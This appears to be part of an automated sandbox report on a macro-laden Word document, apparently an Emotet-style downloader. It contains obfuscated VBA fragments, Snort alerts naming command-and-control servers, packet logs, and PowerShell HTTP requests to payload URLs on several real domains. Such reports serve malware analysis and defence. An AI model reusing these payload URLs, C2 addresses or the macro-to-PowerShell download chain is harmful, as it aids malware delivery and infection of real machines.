                                                                           Next aqFpElJ
                                                                      dwTYCJwLC:
                                                                         GoTo PIEpnIEQ
                                                                           Dim DagVrchHi As Paragraph
                                                                      Set QjbRmCII = ifZhJxP
                                                                           For Each DagVrchHi In Bcur5699z4d.Paragraphs
                                                                      Set QurlJAjI = rQGxCbRtR
                                                                             If Left(DagVrchHi.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
                                                                               PIEpnIEQ = DagVrchHi.Range.ListFormat.ListString
                                                                             ElseIf InStr(DagVrchHi.Range.Text, "kkiew") > 1 Then
                                                                               xWqeABhHw = DagVrchHi.Range.Text
                                                                               xWqeABhHw = Replace(saw, "sjgwb", "hqkwjbjdasd" & PIEpnIEQ)
                                                                               DagVrchHi.Range.Text = xWqeABhHw
                                                                               Set DagVrchHi.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
                                                                             End If
                                                                      Set wJKPQpiH = NirTjIE
                                                                           Next DagVrchHi
                                                                      PIEpnIEQ:
                                                                      End Function
                                                                      VBA File Name: Xxuu21l7kiwbxwj_0, Stream Size: 704
                                                                      General
                                                                       Stream Path: Macros/VBA/Xxuu21l7kiwbxwj_0
                                                                       VBA File Name: Xxuu21l7kiwbxwj_0
                                                                       Stream Size: 704

                                                                      VBA Code Keywords

                                                                      Keyword
                                                                      Attribute
                                                                      VB_Name
                                                                      VBA Code
                                                                      Attribute VB_Name = "Xxuu21l7kiwbxwj_0"

                                                                      Streams

                                                                      Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                                                      General
                                                                       Stream Path: \x1CompObj
                                                                       File Type: data
                                                                       Stream Size: 146
                                                                       Entropy: 4.00187355764
                                                                       Base64 Encoded: False
                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                      General
                                                                       Stream Path: \x5DocumentSummaryInformation
                                                                       File Type: data
                                                                       Stream Size: 4096
                                                                       Entropy: 0.280441275353
                                                                       Base64 Encoded: False
                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 1536
                                                                      General
                                                                       Stream Path: \x5SummaryInformation
                                                                       File Type: data
                                                                       Stream Size: 1536
                                                                       Entropy: 7.89109371025
                                                                       Base64 Encoded: False
                                                                      Stream Path: 1Table, File Type: data, Stream Size: 6861
                                                                      General
                                                                       Stream Path: 1Table
                                                                       File Type: data
                                                                       Stream Size: 6861
                                                                       Entropy: 6.02892947961
                                                                       Base64 Encoded: True
                                                                      Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 517
                                                                      General
                                                                       Stream Path: Macros/PROJECT
                                                                       File Type: ASCII text, with CRLF line terminators
                                                                       Stream Size: 517
                                                                       Entropy: 5.51044136587
                                                                       Base64 Encoded: True
                                                                      Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 134
                                                                      General
                                                                       Stream Path: Macros/PROJECTwm
                                                                       File Type: data
                                                                       Stream Size: 134
                                                                       Entropy: 3.95084728485
                                                                       Base64 Encoded: False
                                                                      Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5553
                                                                      General
                                                                       Stream Path: Macros/VBA/_VBA_PROJECT
                                                                       File Type: data
                                                                       Stream Size: 5553
                                                                       Entropy: 5.57459869251
                                                                       Base64 Encoded: False
                                                                      Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 672
                                                                      General
                                                                       Stream Path: Macros/VBA/dir
                                                                       File Type: data
                                                                       Stream Size: 672
                                                                       Entropy: 6.35085469527
                                                                       Base64 Encoded: True
                                                                      Stream Path: WordDocument, File Type: data, Stream Size: 113278
                                                                      General
                                                                       Stream Path: WordDocument
                                                                       File Type: data
                                                                       Stream Size: 113278
                                                                       Entropy: 7.3453177245
                                                                       Base64 Encoded: True

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                       Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                       01/27/21-12:17:35.820429 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49165 | 191.6.196.95 | 192.168.2.22
                                                                       01/27/21-12:18:49.250556 | TCP | 2404344 | ET CNC Feodo Tracker Reported CnC Server TCP group 23 | 49175 | 80 | 192.168.2.22 | 84.232.229.24
                                                                       01/27/21-12:18:57.070442 | TCP | 2404334 | ET CNC Feodo Tracker Reported CnC Server TCP group 18 | 49176 | 8080 | 192.168.2.22 | 51.255.203.164

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      Jan 27, 2021 12:17:40.617010117 CET49171443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.619255066 CET44349170104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.819360018 CET44349171104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.819415092 CET44349171104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.819436073 CET44349171104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.819464922 CET44349171104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.819740057 CET49171443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.822115898 CET8049165191.6.196.95192.168.2.22
                                                                      Jan 27, 2021 12:17:40.822310925 CET4916580192.168.2.22191.6.196.95
                                                                      Jan 27, 2021 12:17:40.823407888 CET49171443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:41.015614033 CET49172443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.025521040 CET44349171104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:41.167398930 CET4434917235.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.167530060 CET49172443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.168284893 CET49172443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.321968079 CET4434917235.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.322031021 CET4434917235.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.322047949 CET4434917235.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.322351933 CET49172443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.324588060 CET49172443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.325530052 CET49173443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.476396084 CET4434917235.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.478358030 CET4434917335.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.478549957 CET49173443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.479553938 CET49173443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.521337986 CET804916675.103.81.81192.168.2.22
                                                                      Jan 27, 2021 12:17:41.521637917 CET4916680192.168.2.2275.103.81.81
                                                                      Jan 27, 2021 12:17:41.632101059 CET4434917335.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.632145882 CET4434917335.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.632209063 CET4434917335.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.632340908 CET49173443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.636425972 CET49173443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.728960991 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:41.788908958 CET4434917335.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.930414915 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:41.930558920 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:41.931462049 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.132985115 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.133199930 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.133224010 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.133238077 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.133246899 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.133414984 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.134701967 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.134721994 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.134824038 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.150039911 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.421269894 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.454632044 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.725614071 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.725673914 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.725712061 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.725749969 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.725789070 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.725826025 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.725898027 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.725954056 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.726008892 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.726030111 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.726048946 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.726087093 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.726125956 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.726164103 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.726188898 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.726218939 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.726254940 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.726291895 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.726680040 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.726880074 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.727863073 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.927913904 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.927975893 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928014040 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928052902 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928090096 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928138971 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928193092 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928209066 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.928222895 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.928268909 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928280115 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.928318977 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928355932 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928400993 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928412914 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.928452015 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928483963 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.928514004 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928551912 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928577900 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.928610086 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928647995 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928678989 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.928704023 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928744078 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928766012 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.930191994 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.930248976 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.930279970 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.930329084 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.930372953 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.930399895 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.930444002 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.930495977 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.930516958 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.930558920 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.930598974 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.930618048 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.930658102 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.930696011 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.930715084 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.931314945 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.130275965 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.130335093 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.130374908 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.130414009 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.130450964 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.130501986 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.130539894 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.130589008 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.130608082 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.130650043 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.130667925 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.130707979 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.130747080 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.130783081 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.130805969 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.130846977 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.130882025 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.130913019 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.130955935 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.130985975 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.131017923 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.131055117 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.131088018 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.131113052 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.131151915 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.131186962 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.131213903 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.131258011 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.131284952 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.131326914 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.131375074 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.131397009 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.131445885 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.131489038 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.131515026 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.131550074 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.131587029 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.131613016 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.131644011 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.131683111 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.131726980 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.131737947 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.131777048 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.131814003 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.131831884 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.131886959 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.131901026 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.131948948 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.131989956 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.132025957 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.132056952 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.132098913 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.132128000 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.132169008 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.132216930 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.132236958 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.132564068 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.132605076 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.132642031 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.132673025 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.132724047 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.132742882 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.132791042 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.132834911 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.132860899 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.132894993 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.132932901 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.132970095 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.132987976 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.133027077 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.133044958 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.134322882 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.336505890 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.336568117 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.336597919 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.336627960 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.336668968 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.336708069 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.336740971 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.336774111 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.336812973 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.336858988 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.336898088 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.336935997 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.336970091 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.337019920 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.337038994 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:18:50.523777008 CET804917584.232.229.24192.168.2.22
                                                                      Jan 27, 2021 12:18:57.070441961 CET491768080192.168.2.2251.255.203.164
                                                                      Jan 27, 2021 12:19:00.077877045 CET491768080192.168.2.2251.255.203.164
                                                                      Jan 27, 2021 12:19:06.084498882 CET491768080192.168.2.2251.255.203.164
                                                                      Jan 27, 2021 12:19:18.100132942 CET491778080192.168.2.2251.255.203.164
                                                                      Jan 27, 2021 12:19:21.108556986 CET491778080192.168.2.2251.255.203.164
                                                                      Jan 27, 2021 12:19:27.115104914 CET491778080192.168.2.2251.255.203.164

                                                                      UDP Packets


                                                                      DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 27, 2021 12:17:34.783607006 CET | 192.168.2.22 | 8.8.8.8 | 0x82b3 | Standard query (0) | riandutra.com | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:35.839396954 CET | 192.168.2.22 | 8.8.8.8 | 0xe9da | Standard query (0) | calledtochange.org | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:36.524178982 CET | 192.168.2.22 | 8.8.8.8 | 0xfc39 | Standard query (0) | mrveggy.com | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:39.773932934 CET | 192.168.2.22 | 8.8.8.8 | 0x21e1 | Standard query (0) | norailya.com | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:40.848473072 CET | 192.168.2.22 | 8.8.8.8 | 0x9f83 | Standard query (0) | hbprivileged.com | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:41.667201042 CET | 192.168.2.22 | 8.8.8.8 | 0x868 | Standard query (0) | ummahstars.com | A (IP address) | IN (0x0001)

                                                                      DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 27, 2021 12:17:35.270771980 CET | 8.8.8.8 | 192.168.2.22 | 0x82b3 | No error (0) | riandutra.com |  | 191.6.196.95 | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:36.146183968 CET | 8.8.8.8 | 192.168.2.22 | 0xe9da | No error (0) | calledtochange.org |  | 75.103.81.81 | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:36.995876074 CET | 8.8.8.8 | 192.168.2.22 | 0xfc39 | No error (0) | mrveggy.com |  | 177.12.170.95 | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:39.983139992 CET | 8.8.8.8 | 192.168.2.22 | 0x21e1 | No error (0) | norailya.com |  | 104.168.154.203 | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:41.014501095 CET | 8.8.8.8 | 192.168.2.22 | 0x9f83 | No error (0) | hbprivileged.com |  | 35.209.96.32 | A (IP address) | IN (0x0001)
Jan 27, 2021 12:17:41.727834940 CET | 8.8.8.8 | 192.168.2.22 | 0x868 | No error (0) | ummahstars.com |  | 35.163.191.195 | A (IP address) | IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • riandutra.com
                                                                      • calledtochange.org

                                                                      HTTP Packets

Session ID: 0
Source IP: 192.168.2.22
Source Port: 49165
Destination IP: 191.6.196.95
Destination Port: 80
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: Jan 27, 2021 12:17:35.541695118 CET
kBytes transferred: 0
Direction: OUT
Data:
GET /email/AfhE8z0/ HTTP/1.1
Host: riandutra.com
Connection: Keep-Alive

Timestamp: Jan 27, 2021 12:17:35.820429087 CET
kBytes transferred: 1
Direction: IN
Data:
HTTP/1.1 403 Forbidden
                                                                      Date: Wed, 27 Jan 2021 11:17:35 GMT
                                                                      Server: Apache
                                                                      Content-Length: 404
                                                                      Keep-Alive: timeout=5, max=500
                                                                      Connection: Keep-Alive
                                                                      Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /email/AfhE8z0/ on this server.<br />Server unable to read htaccess file, denying access to be safe</p><p>Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 1
Source IP: 192.168.2.22
Source Port: 49166
Destination IP: 75.103.81.81
Destination Port: 80
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: Jan 27, 2021 12:17:36.329037905 CET
kBytes transferred: 1
Direction: OUT
Data:
GET /CalledtoChange/8huSOd/ HTTP/1.1
Host: calledtochange.org
Connection: Keep-Alive

Timestamp: Jan 27, 2021 12:17:36.515872955 CET
kBytes transferred: 2
Direction: IN
Data:
HTTP/1.1 404 Not Found
                                                                      Date: Wed, 27 Jan 2021 11:17:36 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      HTTPS Packets

Timestamp: Jan 27, 2021 12:17:37.519368887 CET
Source IP: 177.12.170.95
Source Port: 443
Dest IP: 192.168.2.22
Dest Port: 49167
JA3 SSL Client Fingerprint: 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
JA3 SSL Client Digest: 05af1f5ca1b87cc9cc9b25185115607d
Certificate chain (Subject | Issuer | Not Before | Not After):
• CN=mrveggy.com | CN=R3, O=Let's Encrypt, C=US | Mon Jan 11 02:13:40 CET 2021 | Sun Apr 11 03:13:40 CEST 2021
• CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021

Timestamp: Jan 27, 2021 12:17:42.134701967 CET
Source IP: 35.163.191.195
Source Port: 443
Dest IP: 192.168.2.22
Dest Port: 49174
JA3 SSL Client Fingerprint: 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
JA3 SSL Client Digest: 05af1f5ca1b87cc9cc9b25185115607d
Certificate chain (Subject | Issuer | Not Before | Not After):
• CN=www.ummahstars.com, OU=Domain Control Validated | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Fri Mar 20 12:52:22 CET 2020 | Thu May 19 22:40:05 CEST 2022
• CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031
• CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Wed Jan 01 08:00:00 CET 2014 | Fri May 30 09:00:00 CEST 2031
